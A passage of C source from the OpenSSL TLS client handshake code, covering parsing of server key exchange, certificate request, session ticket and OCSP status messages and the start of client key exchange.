pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#else
if (0)
;
#endif
#ifndef OPENSSL_NO_DSA
else if (alg_a & SSL_aDSS)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_DSA_SIGN].x509);
#endif
}
else
#endif /* !OPENSSL_NO_SRP */
#ifndef OPENSSL_NO_RSA
if (alg_k & SSL_kRSA)
{
if ((rsa=RSA_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_MODULUS_LENGTH);
goto f_err;
}
param_len += i;
if (!(rsa->n=BN_bin2bn(p,i,rsa->n)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_E_LENGTH);
goto f_err;
}
param_len += i;
if (!(rsa->e=BN_bin2bn(p,i,rsa->e)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
/* this should be because we are using an export cipher */
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
else
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
s->session->sess_cert->peer_rsa_tmp=rsa;
rsa=NULL;
}
#else /* OPENSSL_NO_RSA */
if (0)
;
#endif
#ifndef OPENSSL_NO_DH
else if (alg_k & SSL_kDHE)
{
if ((dh=DH_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_DH_LIB);
goto err;
}
param_len = 2;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_P_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->p=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_G_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->g=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
if (2 > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
param_len += 2;
n2s(p,i);
if (i > n - param_len)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_DH_PUB_KEY_LENGTH);
goto f_err;
}
param_len += i;
if (!(dh->pub_key=BN_bin2bn(p,i,NULL)))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_BN_LIB);
goto err;
}
p+=i;
n-=param_len;
if (!ssl_security(s, SSL_SECOP_TMP_DH,
DH_security_bits(dh), 0, dh))
{
al=SSL_AD_HANDSHAKE_FAILURE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_DH_KEY_TOO_SMALL);
goto f_err;
}
#ifndef OPENSSL_NO_RSA
if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#else
if (0)
;
#endif
#ifndef OPENSSL_NO_DSA
else if (alg_a & SSL_aDSS)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_DSA_SIGN].x509);
#endif
/* else anonymous DH, so no certificate or pkey. */
s->session->sess_cert->peer_dh_tmp=dh;
dh=NULL;
}
else if ((alg_k & SSL_kDHr) || (alg_k & SSL_kDHd))
{
al=SSL_AD_ILLEGAL_PARAMETER;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_TRIED_TO_USE_UNSUPPORTED_CIPHER);
goto f_err;
}
#endif /* !OPENSSL_NO_DH */
#ifndef OPENSSL_NO_ECDH
else if (alg_k & SSL_kECDHE)
{
EC_GROUP *ngroup;
const EC_GROUP *group;
if ((ecdh=EC_KEY_new()) == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
/* Extract elliptic curve parameters and the
* server's ephemeral ECDH public key.
* Keep accumulating lengths of various components in
* param_len and make sure it never exceeds n.
*/
/* XXX: For now we only support named (not generic) curves
* and the ECParameters in this case is just three bytes. We
* also need one byte for the length of the encoded point
*/
param_len=4;
if (param_len > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
/* Check curve is one of our preferences, if not server has
* sent an invalid curve. ECParameters is 3 bytes.
*/
if (!tls1_check_curve(s, p, 3))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_WRONG_CURVE);
goto f_err;
}
if ((curve_nid = tls1_ec_curve_id2nid(*(p + 2))) == 0)
{
al=SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_UNABLE_TO_FIND_ECDH_PARAMETERS);
goto f_err;
}
ngroup = EC_GROUP_new_by_curve_name(curve_nid);
if (ngroup == NULL)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
if (EC_KEY_set_group(ecdh, ngroup) == 0)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_EC_LIB);
goto err;
}
EC_GROUP_free(ngroup);
group = EC_KEY_get0_group(ecdh);
if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) &&
(EC_GROUP_get_degree(group) > 163))
{
al=SSL_AD_EXPORT_RESTRICTION;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_ECGROUP_TOO_LARGE_FOR_CIPHER);
goto f_err;
}
p+=3;
/* Next, get the encoded ECPoint */
if (((srvr_ecpoint = EC_POINT_new(group)) == NULL) ||
((bn_ctx = BN_CTX_new()) == NULL))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_MALLOC_FAILURE);
goto err;
}
encoded_pt_len = *p; /* length of encoded point */
p+=1;
if ((encoded_pt_len > n - param_len) ||
(EC_POINT_oct2point(group, srvr_ecpoint,
p, encoded_pt_len, bn_ctx) == 0))
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_ECPOINT);
goto f_err;
}
param_len += encoded_pt_len;
n-=param_len;
p+=encoded_pt_len;
/* The ECC/TLS specification does not mention
* the use of DSA to sign ECParameters in the server
* key exchange message. We do support RSA and ECDSA.
*/
if (0) ;
#ifndef OPENSSL_NO_RSA
else if (alg_a & SSL_aRSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
#endif
#ifndef OPENSSL_NO_ECDSA
else if (alg_a & SSL_aECDSA)
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_ECC].x509);
#endif
/* else anonymous ECDH, so no certificate or pkey. */
EC_KEY_set_public_key(ecdh, srvr_ecpoint);
s->session->sess_cert->peer_ecdh_tmp=ecdh;
ecdh=NULL;
BN_CTX_free(bn_ctx);
bn_ctx = NULL;
EC_POINT_free(srvr_ecpoint);
srvr_ecpoint = NULL;
}
else if (alg_k)
{
al=SSL_AD_UNEXPECTED_MESSAGE;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_UNEXPECTED_MESSAGE);
goto f_err;
}
#endif /* !OPENSSL_NO_ECDH */
/* p points to the next byte, there are 'n' bytes left */
/* if it was signed, check the signature */
if (pkey != NULL)
{
if (SSL_USE_SIGALGS(s))
{
int rv;
if (2 > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
rv = tls12_check_peer_sigalg(&md, s, p, pkey);
if (rv == -1)
goto err;
else if (rv == 0)
{
goto f_err;
}
#ifdef SSL_DEBUG
fprintf(stderr, "USING TLSv1.2 HASH %s\n", EVP_MD_name(md));
#endif
p += 2;
n -= 2;
}
else
md = EVP_sha1();
if (2 > n)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,
SSL_R_LENGTH_TOO_SHORT);
goto f_err;
}
n2s(p,i);
n-=2;
j=EVP_PKEY_size(pkey);
/* Check signature length. If n is 0 then signature is empty */
if ((i != n) || (n > j) || (n <= 0))
{
/* wrong packet length */
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_WRONG_SIGNATURE_LENGTH);
goto f_err;
}
#ifndef OPENSSL_NO_RSA
if (pkey->type == EVP_PKEY_RSA && !SSL_USE_SIGALGS(s))
{
int num;
unsigned int size;
j=0;
q=md_buf;
for (num=2; num > 0; num--)
{
EVP_MD_CTX_set_flags(&md_ctx,
EVP_MD_CTX_FLAG_NON_FIPS_ALLOW);
EVP_DigestInit_ex(&md_ctx,(num == 2)
?s->ctx->md5:s->ctx->sha1, NULL);
EVP_DigestUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_DigestUpdate(&md_ctx,param,param_len);
EVP_DigestFinal_ex(&md_ctx,q,&size);
q+=size;
j+=size;
}
i=RSA_verify(NID_md5_sha1, md_buf, j, p, n,
pkey->pkey.rsa);
if (i < 0)
{
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_RSA_DECRYPT);
goto f_err;
}
if (i == 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
else
#endif
{
EVP_VerifyInit_ex(&md_ctx, md, NULL);
EVP_VerifyUpdate(&md_ctx,&(s->s3->client_random[0]),SSL3_RANDOM_SIZE);
EVP_VerifyUpdate(&md_ctx,&(s->s3->server_random[0]),SSL3_RANDOM_SIZE);
EVP_VerifyUpdate(&md_ctx,param,param_len);
if (EVP_VerifyFinal(&md_ctx,p,(int)n,pkey) <= 0)
{
/* bad signature */
al=SSL_AD_DECRYPT_ERROR;
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_BAD_SIGNATURE);
goto f_err;
}
}
}
else
{
/* aNULL, aSRP or kPSK do not need public keys */
if (!(alg_a & (SSL_aNULL|SSL_aSRP)) && !(alg_k & SSL_kPSK))
{
/* Might be wrong key type, check it */
if (ssl3_check_cert_and_algorithm(s))
/* Otherwise this shouldn't happen */
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
/* still data left over */
if (n != 0)
{
SSLerr(SSL_F_SSL3_GET_KEY_EXCHANGE,SSL_R_EXTRA_DATA_IN_MESSAGE);
goto f_err;
}
}
EVP_PKEY_free(pkey);
EVP_MD_CTX_cleanup(&md_ctx);
return(1);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
EVP_PKEY_free(pkey);
#ifndef OPENSSL_NO_RSA
if (rsa != NULL)
RSA_free(rsa);
#endif
#ifndef OPENSSL_NO_DH
if (dh != NULL)
DH_free(dh);
#endif
#ifndef OPENSSL_NO_ECDH
BN_CTX_free(bn_ctx);
EC_POINT_free(srvr_ecpoint);
if (ecdh != NULL)
EC_KEY_free(ecdh);
#endif
EVP_MD_CTX_cleanup(&md_ctx);
return(-1);
}
int ssl3_get_certificate_request(SSL *s)
{
int ok,ret=0;
unsigned long n,nc,l;
unsigned int llen, ctype_num,i;
X509_NAME *xn=NULL;
const unsigned char *p,*q;
unsigned char *d;
STACK_OF(X509_NAME) *ca_sk=NULL;
n=s->method->ssl_get_message(s,
SSL3_ST_CR_CERT_REQ_A,
SSL3_ST_CR_CERT_REQ_B,
-1,
s->max_cert_list,
&ok);
if (!ok) return((int)n);
s->s3->tmp.cert_req=0;
if (s->s3->tmp.message_type == SSL3_MT_SERVER_DONE)
{
s->s3->tmp.reuse_message=1;
/* If we get here we don't need any cached handshake records
* as we wont be doing client auth.
*/
if (s->s3->handshake_buffer)
{
if (!ssl3_digest_cached_records(s))
goto err;
}
return(1);
}
if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE_REQUEST)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_UNEXPECTED_MESSAGE);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_WRONG_MESSAGE_TYPE);
goto err;
}
/* TLS does not like anon-DH with client cert */
if (s->version > SSL3_VERSION)
{
if (s->s3->tmp.new_cipher->algorithm_auth & SSL_aNULL)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_UNEXPECTED_MESSAGE);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_TLS_CLIENT_CERT_REQ_WITH_ANON_CIPHER);
goto err;
}
}
p=d=(unsigned char *)s->init_msg;
if ((ca_sk=sk_X509_NAME_new(ca_dn_cmp)) == NULL)
{
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,ERR_R_MALLOC_FAILURE);
goto err;
}
/* get the certificate types */
ctype_num= *(p++);
if (s->cert->ctypes)
{
OPENSSL_free(s->cert->ctypes);
s->cert->ctypes = NULL;
}
if (ctype_num > SSL3_CT_NUMBER)
{
/* If we exceed static buffer copy all to cert structure */
s->cert->ctypes = OPENSSL_malloc(ctype_num);
if (s->cert->ctypes == NULL)
{
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,ERR_R_MALLOC_FAILURE);
goto err;
}
memcpy(s->cert->ctypes, p, ctype_num);
s->cert->ctype_num = (size_t)ctype_num;
ctype_num=SSL3_CT_NUMBER;
}
for (i=0; i<ctype_num; i++)
s->s3->tmp.ctype[i]= p[i];
p+=p[-1];
if (SSL_USE_SIGALGS(s))
{
n2s(p, llen);
/* Check we have enough room for signature algorithms and
* following length value.
*/
if ((unsigned long)(p - d + llen + 2) > n)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_DATA_LENGTH_TOO_LONG);
goto err;
}
/* Clear certificate digests and validity flags */
for (i = 0; i < SSL_PKEY_NUM; i++)
{
s->cert->pkeys[i].digest = NULL;
s->cert->pkeys[i].valid_flags = 0;
}
if ((llen & 1) || !tls1_save_sigalgs(s, p, llen))
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_SIGNATURE_ALGORITHMS_ERROR);
goto err;
}
if (!tls1_process_sigalgs(s))
{
ssl3_send_alert(s,SSL3_AL_FATAL, SSL_AD_INTERNAL_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST, ERR_R_MALLOC_FAILURE);
goto err;
}
p += llen;
}
/* get the CA RDNs */
n2s(p,llen);
#if 0
{
FILE *out;
out=fopen("/tmp/vsign.der","w");
fwrite(p,1,llen,out);
fclose(out);
}
#endif
if ((unsigned long)(p - d + llen) != n)
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_LENGTH_MISMATCH);
goto err;
}
for (nc=0; nc<llen; )
{
n2s(p,l);
if ((l+nc+2) > llen)
{
if ((s->options & SSL_OP_NETSCAPE_CA_DN_BUG))
goto cont; /* netscape bugs */
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_CA_DN_TOO_LONG);
goto err;
}
q=p;
if ((xn=d2i_X509_NAME(NULL,&q,l)) == NULL)
{
/* If netscape tolerance is on, ignore errors */
if (s->options & SSL_OP_NETSCAPE_CA_DN_BUG)
goto cont;
else
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,ERR_R_ASN1_LIB);
goto err;
}
}
if (q != (p+l))
{
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,SSL_R_CA_DN_LENGTH_MISMATCH);
goto err;
}
if (!sk_X509_NAME_push(ca_sk,xn))
{
SSLerr(SSL_F_SSL3_GET_CERTIFICATE_REQUEST,ERR_R_MALLOC_FAILURE);
goto err;
}
p+=l;
nc+=l+2;
}
if (0)
{
cont:
ERR_clear_error();
}
/* we should setup a certificate to return.... */
s->s3->tmp.cert_req=1;
s->s3->tmp.ctype_num=ctype_num;
if (s->s3->tmp.ca_names != NULL)
sk_X509_NAME_pop_free(s->s3->tmp.ca_names,X509_NAME_free);
s->s3->tmp.ca_names=ca_sk;
ca_sk=NULL;
ret=1;
err:
if (ca_sk != NULL) sk_X509_NAME_pop_free(ca_sk,X509_NAME_free);
return(ret);
}
static int ca_dn_cmp(const X509_NAME * const *a, const X509_NAME * const *b)
{
return(X509_NAME_cmp(*a,*b));
}
#ifndef OPENSSL_NO_TLSEXT
int ssl3_get_new_session_ticket(SSL *s)
{
int ok,al,ret=0, ticklen;
long n;
const unsigned char *p;
unsigned char *d;
n=s->method->ssl_get_message(s,
SSL3_ST_CR_SESSION_TICKET_A,
SSL3_ST_CR_SESSION_TICKET_B,
SSL3_MT_NEWSESSION_TICKET,
16384,
&ok);
if (!ok)
return((int)n);
if (n < 6)
{
/* need at least ticket_lifetime_hint + ticket length */
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
p=d=(unsigned char *)s->init_msg;
n2l(p, s->session->tlsext_tick_lifetime_hint);
n2s(p, ticklen);
/* ticket_lifetime_hint + ticket_length + ticket */
if (ticklen + 6 != n)
{
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
if (s->session->tlsext_tick)
{
OPENSSL_free(s->session->tlsext_tick);
s->session->tlsext_ticklen = 0;
}
s->session->tlsext_tick = OPENSSL_malloc(ticklen);
if (!s->session->tlsext_tick)
{
SSLerr(SSL_F_SSL3_GET_NEW_SESSION_TICKET,ERR_R_MALLOC_FAILURE);
goto err;
}
memcpy(s->session->tlsext_tick, p, ticklen);
s->session->tlsext_ticklen = ticklen;
/* There are two ways to detect a resumed ticket session.
* One is to set an appropriate session ID and then the server
* must return a match in ServerHello. This allows the normal
* client session ID matching to work and we know much
* earlier that the ticket has been accepted.
*
* The other way is to set zero length session ID when the
* ticket is presented and rely on the handshake to determine
* session resumption.
*
* We choose the former approach because this fits in with
* assumptions elsewhere in OpenSSL. The session ID is set
* to the SHA256 (or SHA1 is SHA256 is disabled) hash of the
* ticket.
*/
EVP_Digest(p, ticklen,
s->session->session_id, &s->session->session_id_length,
#ifndef OPENSSL_NO_SHA256
EVP_sha256(), NULL);
#else
EVP_sha1(), NULL);
#endif
ret=1;
return(ret);
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
err:
return(-1);
}
int ssl3_get_cert_status(SSL *s)
{
int ok, al;
unsigned long resplen,n;
const unsigned char *p;
n=s->method->ssl_get_message(s,
SSL3_ST_CR_CERT_STATUS_A,
SSL3_ST_CR_CERT_STATUS_B,
SSL3_MT_CERTIFICATE_STATUS,
16384,
&ok);
if (!ok) return((int)n);
if (n < 4)
{
/* need at least status type + length */
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
p = (unsigned char *)s->init_msg;
if (*p++ != TLSEXT_STATUSTYPE_ocsp)
{
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,SSL_R_UNSUPPORTED_STATUS_TYPE);
goto f_err;
}
n2l3(p, resplen);
if (resplen + 4 != n)
{
al = SSL_AD_DECODE_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,SSL_R_LENGTH_MISMATCH);
goto f_err;
}
if (s->tlsext_ocsp_resp)
OPENSSL_free(s->tlsext_ocsp_resp);
s->tlsext_ocsp_resp = BUF_memdup(p, resplen);
if (!s->tlsext_ocsp_resp)
{
al = SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,ERR_R_MALLOC_FAILURE);
goto f_err;
}
s->tlsext_ocsp_resplen = resplen;
if (s->ctx->tlsext_status_cb)
{
int ret;
ret = s->ctx->tlsext_status_cb(s, s->ctx->tlsext_status_arg);
if (ret == 0)
{
al = SSL_AD_BAD_CERTIFICATE_STATUS_RESPONSE;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,SSL_R_INVALID_STATUS_RESPONSE);
goto f_err;
}
if (ret < 0)
{
al = SSL_AD_INTERNAL_ERROR;
SSLerr(SSL_F_SSL3_GET_CERT_STATUS,ERR_R_MALLOC_FAILURE);
goto f_err;
}
}
return 1;
f_err:
ssl3_send_alert(s,SSL3_AL_FATAL,al);
return(-1);
}
#endif
int ssl3_get_server_done(SSL *s)
{
int ok,ret=0;
long n;
n=s->method->ssl_get_message(s,
SSL3_ST_CR_SRVR_DONE_A,
SSL3_ST_CR_SRVR_DONE_B,
SSL3_MT_SERVER_DONE,
30, /* should be very small, like 0 :-) */
&ok);
if (!ok) return((int)n);
if (n > 0)
{
/* should contain no data */
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_DECODE_ERROR);
SSLerr(SSL_F_SSL3_GET_SERVER_DONE,SSL_R_LENGTH_MISMATCH);
return -1;
}
ret=1;
return(ret);
}
int ssl3_send_client_key_exchange(SSL *s)
{
unsigned char *p;
int n;
unsigned long alg_k;
#ifndef OPENSSL_NO_RSA
unsigned char *q;
EVP_PKEY *pkey=NULL;
#endif
#ifndef OPENSSL_NO_KRB5
KSSL_ERR kssl_err;
#endif /* OPENSSL_NO_KRB5 */
#ifndef OPENSSL_NO_ECDH
EC_KEY *clnt_ecdh = NULL;
const EC_POINT *srvr_ecpoint = NULL;
EVP_PKEY *srvr_pub_pkey = NULL;
unsigned char *encodedPoint = NULL;
int encoded_pt_len = 0;
BN_CTX * bn_ctx = NULL;
#endif
if (s->state == SSL3_ST_CW_KEY_EXCH_A)
{
p = ssl_handshake_start(s);
alg_k=s->s3->tmp.new_cipher->algorithm_mkey;
/* Fool emacs indentation */
if (0) {}
#ifndef OPENSSL_NO_RSA
else if (alg_k & SSL_kRSA)
{
RSA *rsa;
unsigned char tmp_buf[SSL_MAX_MASTER_KEY_LENGTH];
if (s->session->sess_cert == NULL)
{
/* We should always have a server certificate with SSL_kRSA. */
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
if (s->session->sess_cert->peer_rsa_tmp != NULL)
rsa=s->session->sess_cert->peer_rsa_tmp;
else
{
pkey=X509_get_pubkey(s->session->sess_cert->peer_pkeys[SSL_PKEY_RSA_ENC].x509);
if ((pkey == NULL) ||
(pkey->type != EVP_PKEY_RSA) ||
(pkey->pkey.rsa == NULL))
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,ERR_R_INTERNAL_ERROR);
goto err;
}
rsa=pkey->pkey.rsa;
EVP_PKEY_free(pkey);
}
tmp_buf[0]=s->client_version>>8;
tmp_buf[1]=s->client_version&0xff;
if (RAND_bytes(&(tmp_buf[2]),sizeof tmp_buf-2) <= 0)
goto err;
s->session->master_key_length=sizeof tmp_buf;
q=p;
/* Fix buf for TLS and beyond */
if (s->version > SSL3_VERSION)
p+=2;
n=RSA_public_encrypt(sizeof tmp_buf,
tmp_buf,p,rsa,RSA_PKCS1_PADDING);
#ifdef PKCS1_CHECK
if (s->options & SSL_OP_PKCS1_CHECK_1) p[1]++;
if (s->options & SSL_OP_PKCS1_CHECK_2) tmp_buf[0]=0x70;
#endif
if (n <= 0)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,SSL_R_BAD_RSA_ENCRYPT);
goto err;
}
/* Fix buf for TLS and beyond */
if (s->version > SSL3_VERSION)
{
s2n(n,q);
n+=2;
}
s->session->master_key_length=
s->method->ssl3_enc->generate_master_secret(s,
s->session->master_key,
tmp_buf,sizeof tmp_buf);
OPENSSL_cleanse(tmp_buf,sizeof tmp_buf);
}
#endif
#ifndef OPENSSL_NO_KRB5
else if (alg_k & SSL_kKRB5)
{
krb5_error_code krb5rc;
KSSL_CTX *kssl_ctx = s->kssl_ctx;
/* krb5_data krb5_ap_req; */
krb5_data *enc_ticket;
krb5_data authenticator, *authp = NULL;
EVP_CIPHER_CTX ciph_ctx;
const EVP_CIPHER *enc = NULL;
unsigned char iv[EVP_MAX_IV_LENGTH];
unsigned char tmp_buf[SSL_MAX_MASTER_KEY_LENGTH];
unsigned char epms[SSL_MAX_MASTER_KEY_LENGTH
+ EVP_MAX_IV_LENGTH];
int padl, outl = sizeof(epms);
EVP_CIPHER_CTX_init(&ciph_ctx);
#ifdef KSSL_DEBUG
fprintf(stderr,"ssl3_send_client_key_exchange(%lx & %lx)\n",
alg_k, SSL_kKRB5);
#endif /* KSSL_DEBUG */
authp = NULL;
#ifdef KRB5SENDAUTH
if (KRB5SENDAUTH) authp = &authenticator;
#endif /* KRB5SENDAUTH */
krb5rc = kssl_cget_tkt(kssl_ctx, &enc_ticket, authp,
&kssl_err);
enc = kssl_map_enc(kssl_ctx->enctype);
if (enc == NULL)
goto err;
#ifdef KSSL_DEBUG
{
fprintf(stderr,"kssl_cget_tkt rtn %d\n", krb5rc);
if (krb5rc && kssl_err.text)
fprintf(stderr,"kssl_cget_tkt kssl_err=%s\n", kssl_err.text);
}
#endif /* KSSL_DEBUG */
if (krb5rc)
{
ssl3_send_alert(s,SSL3_AL_FATAL,
SSL_AD_HANDSHAKE_FAILURE);
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE,
kssl_err.reason);
goto err;
}
/*-
* 20010406 VRS - Earlier versions used KRB5 AP_REQ
* in place of RFC 2712 KerberosWrapper, as in:
*
* Send ticket (copy to *p, set n = length)
* n = krb5_ap_req.length;
* memcpy(p, krb5_ap_req.data, krb5_ap_req.length);
* if (krb5_ap_req.data)
* kssl_krb5_free_data_contents(NULL,&krb5_ap_req);
*
* Now using real RFC 2712 KerberosWrapper
* (Thanks to Simon Wilkinson <sxw@sxw.org.uk>)
* Note: 2712 "opaque" types are here replaced
* with a 2-byte length followed by the value.
* Example:
* KerberosWrapper= xx xx asn1ticket 0 0 xx xx encpms
* Where "xx xx" = length bytes. Shown here with
* optional authenticator omitted.
*/
/* KerberosWrapper.Ticket */
s2n(enc_ticket->length,p);
memcpy(p, enc_ticket->data, enc_ticket->length);
p+= enc_ticket->length;
n = enc_ticket->length + 2;
/* KerberosWrapper.Authenticator */
if (authp && authp->length)
{
s2n(authp->length,p);
memcpy(p, authp->data, authp->length);
p+= authp->length;
n+= authp->length + 2;
free(authp->data);
authp->data = NULL;
authp->length = 0;
}
else
{
s2n(0,p);/* null authenticator length */
n+=2;
}
tmp_buf[0]=s->client_version>>8;
tmp_buf[1]=s->client_version&0xff;
if (RAND_bytes(&(tmp_buf[2]),sizeof tmp_buf-2) <= 0)
goto err;
/*-
* 20010420 VRS. Tried it this way; failed.
* EVP_EncryptInit_ex(&ciph_ctx,enc, NULL,NULL);
* EVP_CIPHER_CTX_set_key_length(&ciph_ctx,
* kssl_ctx->length);
* EVP_EncryptInit_ex(&ciph_ctx,NULL, key,iv);
*/
memset(iv, 0, sizeof iv); /* per RFC 1510 */
EVP_EncryptInit_ex(&ciph_ctx,enc, NULL,
kssl_ctx->key,iv);
EVP_EncryptUpdate(&ciph_ctx,epms,&outl,tmp_buf,
sizeof tmp_buf);
EVP_EncryptFinal_ex(&ciph_ctx,&(epms[outl]),&padl);
outl += padl;
if (outl > (int)sizeof epms)
{
SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
goto err;
}
EVP_CIPHER_CTX_cleanup(&ciph_ctx);
/* KerberosWrapper.EncryptedPreMasterSecret */
s2n(outl,p);
